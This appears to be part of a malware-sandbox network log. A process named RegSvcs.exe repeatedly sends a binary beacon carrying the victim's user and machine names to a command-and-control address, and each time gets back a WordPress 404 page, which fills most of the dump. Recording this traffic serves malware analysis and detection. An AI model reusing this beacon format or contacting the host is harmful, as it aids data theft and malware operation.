                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:43:09.135085106 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:43:09.135093927 CEST224INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            22192.168.2.94973745.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:09.282526970 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:09.290288925 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:11.778201103 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:09 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:11.778222084 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:43:11.778233051 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:43:11.778469086 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:43:11.778492928 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:43:11.778507948 CEST1236INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:43:11.778528929 CEST1236INData Raw: 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31
                                            Data Ascii: gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135de
                                            May 29, 2024 15:43:11.778542042 CEST1120INData Raw: 38 30 3a 20 35 2e 30 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72
                                            Data Ascii: 80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3p
                                            May 29, 2024 15:43:11.778553963 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:43:11.778568029 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            23192.168.2.94973845.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:11.942922115 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:11.948863029 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:14.553116083 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:12 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:14.553134918 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:43:14.553144932 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:43:14.553154945 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:43:14.553164959 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:43:14.553174019 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:43:14.553184032 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:43:14.553195953 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:43:14.553245068 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:43:14.553280115 CEST224INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            24192.168.2.94973945.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:14.729917049 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:14.734863043 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:17.206835032 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:15 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:17.206871033 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:43:17.206886053 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:43:17.206928968 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:43:17.206971884 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:43:17.206985950 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
